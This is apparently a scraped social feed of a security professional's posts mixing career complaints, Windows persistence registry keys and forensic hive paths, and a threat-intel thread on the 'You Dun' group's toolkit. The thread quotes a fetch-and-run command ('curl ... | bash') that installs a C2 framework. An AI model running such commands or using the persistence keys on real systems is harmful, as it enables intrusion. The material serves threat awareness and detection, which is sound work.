youtube.com/clip/UgkxTSp...
When we’re quick to give advice, what happens?
07.05.2025 14:20
👍 0
🔁 0
💬 0
📌 0
youtube.com/clip/UgkxTSp...
When we’re quick to give advice, what happens?
Someone forgot to filter for prompt injection...
Hayo,
I built my webapp which searches in google then outputs the search results in addition to ai summary for each search result!! Isn’t that amazing 😍
my-threat-news.vercel.app
How do you exit vim?
Ever used forensics for threat detection?
If yes please explain.
Registry Settings for Code Persistence
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run: used to start automatically for all users during system startup.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run: used to start automatically for the current user during login.
Important registry files:
%SYSTEMROOT%\system32\config
-- SYSTEM
-- SOFTWARE
-- SAM
-- SECURITY
user profile (e.g., c:\users\administrator)
-- NTUSER.DAT
-- USRCLASS.DAT
C:\Windows\appcompat\Programs\
-- AMCACHE.HVE
It seems like a remote job is a good idea *manifesting*
Or how many incidents have occurred when in fact there were no detection rules activated to detect any !
number of vulnerabilities patched when in fact the scanner wasn’t functioning.. Properly so the number is not accurate 🫢 and list goes on of issues
I do consider myself highly qualified for the job of cybersecurity operations manager but i always get hit by audits because the way I look to it is that i see operational issues and I fix them but to the audits they want lets say
Totally agree
And just when we think we’re ahead,
Suddenly, all our efforts feel like they’re unseen, and we’re back to square one.
Every time I feel like I’m making progress whether by implementing a new solution or improving a process I get hit by regulatory checks that expose fundamental gaps.
People who work in cyber security of a highly regulated companies.. how do you manage the pressure of compliance and especially when IT fails to provide the necessary support or even follow basic cybersecurity guidelines?
You’re welcome
i am on a mission to complete all defensive security badges in Cybrary because why NOT!
Yeah I did install it on my pc its easy to setup 👍🏼
I stumbled upon this open-source ChatGPT alternative that runs 100% offline!
jan.ai
Deepseek has been my daily driver for a while and what most don't know is that it is suspiciously good at writing offsec tools...
LOLBins/Drivers Key resources:
→ LOLBAS: [lolbas-project.github.io](lolbas-project.github.io)
→ LOLDrivers: [loldrivers.io](www.loldrivers.io)
Detect abused tools & malicious drivers.
#LOLBins #LOLDrivers
11. CDK
- Escapes Docker via `mount-cgroup` and deploys crypto miners.
12. LockBit 3.0 Builder
- Custom `LB3.exe` drops ransom notes linking to `t.me/You_Dun`.
13. Telegram & Redis
- Telegram channel `You_Dun` for victim shaming.
→ [The DFIR Report](thedfirreport.com)
9. Viper C2
- Installation: Deployed via `curl -sL f8x.io/viper | bash`.
Privilege Escalation
10. Traitor
- Exploits Linux vulns (e.g., CVE-2021-4034) for root access.
🚨 the "You Dun" Threat Group
Command & Control (C2)
8. Cobalt Strike
- Plugins:
- TaoWu: Drops `SharpHound.exe` for AD recon and `JuicyPotato.dll` for privilege escalation.
- Ladon: Automates payload execution across Windows domains.
🛑 the "You Dun" Threat Group
exploitation toolkit:
5. SQLmap
- Automated SQLi tool used to dump databases
6. Seeyon_exp
- Custom exploit
7. Weaver_exp
- Zhiyuan OA weaponizer leveraging deserialization flaws.
[The DFIR Report](thedfirreport.com)
4. Dirsearch
- Directory brute-forcer to map exposed endpoints.
- TTP: Targets `/wp-admin`, `/backup`, and other sensitive paths.
- Detect: Block IPs with repetitive `404`/`403` errors in short timeframes.
3. Xray
- mass vulnerability scanner probing Chinese websites for misconfigurations.
- TTP: Focuses on CMS platforms and IoT devices.
- Detect: Watch for aggressive scanning patterns (e.g., 10+ unique paths/sec).